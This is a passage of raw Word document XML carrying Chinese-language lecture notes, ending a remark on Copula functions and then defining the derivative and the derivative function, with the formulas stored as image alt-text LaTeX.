      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Copula</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中边缘分布反映单变量的信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,Copula</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7CEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数反映各变量之间的相关结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>微积分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00054446" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rStyle w:val="mw-editsection-bracket"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00DA3AC4" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>设函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="704850" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="203" name="图片 203" descr="说明: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y=f(x)\,\!"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="171450" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="202" name="图片 202" descr="说明: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x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的某个</w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:tooltip="邻域（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>邻域</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内有定义，当自变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="201" name="图片 201"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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="171450" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="200" name="图片 200" descr="说明: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x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处取得增量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="152400" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199" name="图片 199" descr="说明: \Del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Delta "/>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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="198" name="图片 198"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点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="561975" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="197" name="图片 197" descr="说明: \;x_{0}+\Del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x_{0}+\Delta "/>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Pr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="196" name="图片 196"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仍在该邻域内）时，相应地函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="95250" cy="123825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="195" name="图片 195" descr="说明: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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>取得增量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="152400" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="194" name="图片 194" descr="说明: \Del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说明: \Delta "/>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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1924050" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="193" name="图片 193" descr="说明: y=f(x_{0}+\Delta x)-f(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y=f(x_{0}+\Delta x)-f(x_{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24050" cy="200025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>；如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="152400" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="192" name="图片 192" descr="说明: \Del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Delta "/>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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="95250" cy="123825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="191" name="图片 191" descr="说明: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说明: \;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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="152400" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190" name="图片 190" descr="说明: \Del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说明: \Delta "/>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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="189" name="图片 189"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之比当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="152400" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="188" name="图片 188" descr="说明: \Del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说明: \Delta "/>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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="485775" cy="142875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="187" name="图片 187" descr="说明: x\to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说明: x\to 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5775" cy="142875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时的极限存在，则称函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="704850" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="186" name="图片 186" descr="说明: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说明: y=f(x)\,\!"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="171450" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="185" name="图片 185" descr="说明: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说明: \;x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:tooltip="可导（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>可导</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，并称这个极限为函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="704850" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="184" name="图片 184" descr="说明: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说明: y=f(x)\,\!"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="171450" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183" name="图片 183" descr="说明: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说明: \;x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处的导数，记为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="457200" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182" name="图片 182" descr="说明: f'(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说明: f'(x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3733800" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="181" name="图片 181" descr="说明: f'(x_{0})=\lim _{{\Delta x\to 0}}{\frac  {\Delta y}{\Delta x}}=\lim _{{\Delta x\to 0}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\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说明: f'(x_{0})=\lim _{{\Delta x\to 0}}{\frac  {\Delta y}{\Delta x}}=\lim _{{\Delta x\to 0}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}"/>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33800" cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>也可记作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="504825" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="180" name="图片 180" descr="说明: \left.y^{\prime }\right|_{{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说明: \left.y^{\prime }\right|_{{x=x_{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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="590550" cy="514350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179" name="图片 179" descr="说明: \left.{\frac  {dy}{dx}}\right|_{{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说明: \left.{\frac  {dy}{dx}}\right|_{{x=x_{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0550" cy="514350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="809625" cy="514350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="178" name="图片 178" descr="说明: \left.{\frac  {df(x)}{dx}}\right|_{{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说明: \left.{\frac  {df(x)}{dx}}\right|_{{x=x_{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09625" cy="514350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>若将一点扩展成函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="177" name="图片 177" descr="说明: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说明: f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在其定义域包含的某</w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:tooltip="开区间（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>开区间</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="95250" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="176" name="图片 176" descr="说明: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说明: I"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内每一个点，那么函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="175" name="图片 175" descr="说明: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说明: f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:tooltip="开区间（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>开区间</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="95250" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174" name="图片 174" descr="说明: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说明: \;I\;"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内可导，这时对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="95250" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="173" name="图片 173" descr="说明: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I\;"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内每一个确定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="104775" cy="85725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="172" name="图片 172"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值，都对应着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="171" name="图片 171" descr="说明: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说明: f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的一个确定的导数，如此一来每一个导数就构成了一个新的函数，这个函数称作</w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:tooltip="原函数（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>原函数</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="170" name="图片 170" descr="说明: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说明: f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的导函数，记作：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="133350" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="169" name="图片 169" descr="说明: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说明: y'"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="390525" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="168" name="图片 168" descr="说明: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说明: f'(x)\;\!"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="428625" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="167" name="图片 167" descr="说明: {\frac  {df(x)}{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说明: {\frac  {df(x)}{dx}}"/>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 cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>导函数的定义表达式为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2533650" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="166" name="图片 166" descr="说明: f'(x)=\lim _{{\Delta x\to 0}}{\frac  {f(x+\Delta x)-f(x)}{\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说明: f'(x)=\lim _{{\Delta x\to 0}}{\frac  {f(x+\Delta x)-f(x)}{\Delta x}}"/>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33650" cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>值得注意的是，导数是一个数，是指函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="165" name="图片 165" descr="说明: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说明: f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
